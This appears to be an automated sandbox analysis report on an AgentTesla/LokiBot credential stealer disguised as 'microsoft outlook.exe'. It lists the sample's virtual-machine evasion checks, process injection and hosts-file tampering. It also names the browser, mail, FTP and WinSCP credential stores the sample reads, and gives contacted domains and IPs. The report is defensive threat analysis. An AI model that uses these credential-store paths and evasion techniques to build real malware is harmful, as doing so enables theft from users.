                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
                      Source: C:\Users\user\Desktop\microsoft outlook.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\microsoft outlook.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\microsoft outlook.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\microsoft outlook.exe TID: 6936Thread sleep time: -21213755684765971s >= -30000s
                      Source: C:\Users\user\Desktop\microsoft outlook.exe TID: 7000Thread sleep count: 2268 > 30
                      Source: C:\Users\user\Desktop\microsoft outlook.exe TID: 7000Thread sleep count: 7579 > 30
                      Source: C:\Users\user\Desktop\microsoft outlook.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\microsoft outlook.exeWindow / User API: threadDelayed 2268
                      Source: C:\Users\user\Desktop\microsoft outlook.exeWindow / User API: threadDelayed 7579
                      Source: C:\Users\user\Desktop\microsoft outlook.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\microsoft outlook.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_00405C22 FindFirstFileA,FindClose,
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_00402630 FindFirstFileA,
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_00404A29 FindFirstFileExW,
                      Source: C:\Users\user\Desktop\microsoft outlook.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\microsoft outlook.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\Desktop\microsoft outlook.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\Desktop\microsoft outlook.exeAPI call chain: ExitProcess graph end node
                      Source: microsoft outlook.exe, 00000003.00000003.522728351.0000000005A7E000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.562236559.0000000005A70000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_004067FE GetProcessHeap,
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2FC402 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2FC706 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2FC744 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2FC616 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2FC6C7 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_004035F1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\microsoft outlook.exeMemory allocated: page read and write | page guard
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_00401E1D SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Modifies the hosts fileShow sources
                      Source: C:\Users\user\Desktop\microsoft outlook.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\microsoft outlook.exeMemory written: C:\Users\user\Desktop\microsoft outlook.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess created: C:\Users\user\Desktop\microsoft outlook.exe "C:\Users\user\Desktop\microsoft outlook.exe"
                      Source: microsoft outlook.exe, 00000003.00000002.559696214.0000000000E80000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: microsoft outlook.exe, 00000003.00000002.559696214.0000000000E80000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: microsoft outlook.exe, 00000003.00000002.559696214.0000000000E80000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: microsoft outlook.exe, 00000003.00000002.559696214.0000000000E80000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\microsoft outlook.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\microsoft outlook.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\microsoft outlook.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\microsoft outlook.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\microsoft outlook.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\microsoft outlook.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\microsoft outlook.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\microsoft outlook.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_0040208D cpuid
                      Source: C:\Users\user\Desktop\microsoft outlook.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Modifies the hosts fileShow sources
                      Source: C:\Users\user\Desktop\microsoft outlook.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.415058.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.4950000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.4e64c8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.415058.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.415058.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.4e64c8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.3515530.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.microsoft outlook.exe.2441458.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.microsoft outlook.exe.2441458.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.415058.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.microsoft outlook.exe.2430000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.3515530.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.microsoft outlook.exe.2430000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.1.microsoft outlook.exe.415058.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.1.microsoft outlook.exe.415058.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.1.microsoft outlook.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.4950000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.415058.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.415058.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.49a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000000.297608589.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.300252799.0000000002430000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.561417373.00000000049A2000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.561213079.0000000003511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.298689668.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000001.299532186.0000000000414000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.561338501.0000000004950000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.558241910.00000000004CA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.557953046.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: microsoft outlook.exe PID: 1752, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Users\user\Desktop\microsoft outlook.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\microsoft outlook.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\microsoft outlook.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\Desktop\microsoft outlook.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\microsoft outlook.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\microsoft outlook.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Users\user\Desktop\microsoft outlook.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\microsoft outlook.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\microsoft outlook.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: Yara matchFile source: 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: microsoft outlook.exe PID: 1752, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.415058.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.4950000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.4e64c8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.415058.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.415058.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.4e64c8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.3515530.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.microsoft outlook.exe.2441458.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.microsoft outlook.exe.2441458.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.415058.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.microsoft outlook.exe.2430000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.3515530.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.microsoft outlook.exe.2430000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.1.microsoft outlook.exe.415058.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.1.microsoft outlook.exe.415058.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.1.microsoft outlook.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.4950000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.415058.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.415058.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.microsoft outlook.exe.49a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.microsoft outlook.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000000.297608589.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.300252799.0000000002430000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.561417373.00000000049A2000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.561213079.0000000003511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.298689668.0000000000414000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000001.299532186.0000000000414000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.561338501.0000000004950000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.558241910.00000000004CA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.557953046.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: microsoft outlook.exe PID: 1752, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112File and Directory Permissions Modification1OS Credential Dumping2System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
                      Default AccountsNative API11Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1Credentials in Registry1File and Directory Discovery2Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerSystem Information Discovery127SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationApplication Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSecurity Software Discovery231Distributed Component Object ModelClipboard Data1Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion131Cached Domain CredentialsVirtualization/Sandbox Evasion131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      microsoft outlook.exe56%VirustotalBrowse
                      microsoft outlook.exe12%MetadefenderBrowse
                      microsoft outlook.exe100%AviraHEUR/AGEN.1211150

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\nsm4A2D.tmp\wbyrs.dll100%AviraTR/Injector.wiefs
                      C:\Users\user\AppData\Local\Temp\nsm4A2D.tmp\wbyrs.dll18%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\nsm4A2D.tmp\wbyrs.dll81%ReversingLabsWin32.Trojan.LokiBot

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      3.0.microsoft outlook.exe.400000.11.unpack100%AviraTR/Spy.Gen8Download File
                      3.0.microsoft outlook.exe.400000.9.unpack100%AviraTR/Spy.Gen8Download File
                      3.0.microsoft outlook.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                      3.0.microsoft outlook.exe.400000.7.unpack100%AviraTR/Spy.Gen8Download File
                      3.2.microsoft outlook.exe.400000.1.unpack100%AviraTR/Spy.Gen8Download File
                      3.0.microsoft outlook.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      3.1.microsoft outlook.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      3.0.microsoft outlook.exe.400000.5.unpack100%AviraTR/Spy.Gen8Download File
                      3.0.microsoft outlook.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                      3.2.microsoft outlook.exe.49a0000.5.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      cgyasc.com0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://mail.cgyasc.com0%Avira URL Cloudsafe
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://YcxkAh.com0%Avira URL Cloudsafe
                      http://cgyasc.com0%VirustotalBrowse
                      http://cgyasc.com0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://d8P2A6TrVo.net0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      cgyasc.com
                      192.185.25.212
                      truetrueunknown
                      mail.cgyasc.com
                      unknown
                      unknowntrue
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://mail.cgyasc.commicrosoft outlook.exe, 00000003.00000002.560904754.0000000002863000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.560924455.0000000002868000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://127.0.0.1:HTTP/1.1microsoft outlook.exe, 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://DynDns.comDynDNSmicrosoft outlook.exe, 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://YcxkAh.commicrosoft outlook.exe, 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://nsis.sf.net/NSIS_Errormicrosoft outlook.exefalse
                          high
                          http://nsis.sf.net/NSIS_ErrorErrormicrosoft outlook.exefalse
                            high
                            http://cgyasc.commicrosoft outlook.exe, 00000003.00000002.560904754.0000000002863000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.560924455.0000000002868000.00000004.00000001.sdmpfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hamicrosoft outlook.exe, 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
